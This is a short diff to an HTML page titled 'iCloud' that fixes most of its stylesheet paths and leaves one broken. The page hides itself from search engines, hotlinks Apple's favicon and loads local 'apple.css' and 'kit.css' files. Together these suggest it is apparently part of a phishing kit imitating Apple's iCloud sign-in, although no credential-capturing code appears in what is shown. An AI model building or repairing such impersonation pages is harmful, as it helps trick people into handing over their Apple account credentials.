--- a/codeindex/r/index.html
+++ b/codeindex/r/index.html
@@ -6,11 +6,11 @@
 	<meta content="width=device-width, initial-scale=1" name="viewport">
 	<meta name="robots" content="noindex, nofollow">
 	<title>iCloud</title>
-	<link rel="stylesheet" href=".../code/strap.css">
+	<link rel="stylesheet" href="../code/strap.css">
     <link rel="shortcut icon" type="image/x-icon" href="https://appleid.cdn-apple.com/static/bin/cb3606853004/images/favicon.ico">
-	<link rel="stylesheet" href=".../code/apple.css">
-	<link rel="stylesheet" href=".../code/kit.css">
-	<link rel="stylesheet" href=".../code/animate.css">	
+	<link rel="stylesheet" href="../code/apple.css">
+	<link rel="stylesheet" href="../code/kit.css">
+	<link rel="stylesheet" href="../code/animate.css">	
 	<link rel="stylesheet" type="text/css" media="screen" href=".../code/app.css">
 </head>
 <body>
